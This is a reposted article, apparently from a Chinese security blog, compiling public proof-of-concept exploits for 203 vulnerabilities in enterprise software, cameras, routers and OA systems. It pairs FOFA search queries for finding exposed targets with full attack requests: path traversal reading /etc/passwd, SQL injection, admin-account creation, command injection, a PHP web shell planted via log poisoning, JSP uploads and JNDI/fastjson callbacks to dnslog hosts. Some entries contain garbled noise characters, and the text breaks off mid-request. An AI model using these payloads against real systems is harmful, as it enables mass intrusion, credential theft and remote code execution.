
Compilation of Publicly Disclosed Internet Vulnerabilities 202309-202406 (repost)

Posted on 2024-6-5 14:31:29
Compilation of Publicly Disclosed Internet Vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界, author 网络安全新视界

Purpose of publication: exploitation of N-day vulnerabilities accounts for a large share of real-world attacks, and this article is meant to help with defense. Defenders can use its contents to carry out risk checks.

Source of vulnerabilities: the article covers 203 POCs for high-impact vulnerabilities publicly disclosed in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Article content: because of length limits, a few POCs that are too long are uniformly replaced with the word PAYLOAD; search for the complete POC yourself if you need it.

Legal rights: if the content infringes any party's legitimate rights, contact the 网络安全新视界 team via the backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to see the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).
Contents

01

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. 万户 ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. 奇安信网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 construction quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达 Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire and rescue dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景 EHR OutputCode arbitrary file read
169. 宏景 EHR downlawbase SQL injection
170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视 management system dmku SQL injection
201. 方正 omnimedia news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload
POC list

02

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user addition
FOFA: title="EasyCVR"

Set password to the MD5 of your own password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the admin panel with the default account admin, perform the following
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword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
Host: x.x.x.x

The payload is the double URL-encoded form of the following statement

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step one: obtain a cookie
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request; the function to execute is passed base64-encoded
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor


Send the following request to the target to execute the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked data includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
  "a":{
    "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}


22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

- F' Y9 W' T$ m1 {6 {2 v
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行7 J7 @$ Y. v" z6 V, A  U) V
FOFA:icon_hash="-1935899595"
7 H! j- |/ J1 R) x. o# uPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
! L6 P7 b6 K4 j" O! M% `Host: your-ip0 {$ y# [" j9 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* r' g( z! {# b# x0 @* ?Content-Type: application/json;charset=utf-8
! s6 S8 @. }' W9 fAccept-Encoding: gzip5 T" e6 h* z$ N0 p
Connection: close/ k# w, K$ Q4 U5 S
' x5 \3 C8 d% m' t& |* U% x
{
3 n! o# a& G- {7 ?- N/ v    "a":{( P" _7 c& [" v7 ?
        "@type":"com.alibaba.fastjson.JSONObject",! Q. o: N, G  Q( `1 a
       {"@type":"java.net.URL","val":"http://DNSLOG"}' k, Y7 i7 h$ d4 W3 @* L  T( k. }
        }""
7 s4 @8 p) w8 F# `! Y- ~}
* `0 w6 z$ [0 D* k! K: u% [7 G: J- }3 X1 g; m/ |; k
  D; F9 l5 A- Y2 X
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Uploaded file path:
/uapim/static/pages/nc/head.jsp

, ~1 v9 k/ Z  R& ]5 w29. 用友NC down/bill SQL注入7 ?: ], H: M  G" j
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
9 j: a( f. z7 T9 V; W6 x" QGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
$ d! R: g) N+ U* N6 m' d2 T# V6 wHost: your-ip7 c! M! T1 x, n- c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 w" @3 L5 d+ [, F# H- l4 u8 `
Content-Type: application/x-www-form-urlencoded
$ A% X0 c0 X" aAccept-Encoding: gzip, deflate  K0 N' {$ X% k' N  [- ]1 k* p
Accept: */*- l9 j6 X5 K2 o. ^1 I$ x
Connection: keep-alive3 n) y1 S% c7 m; P1 g
! f7 l; ]% q. \$ }
! H7 L6 P+ f) q
30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
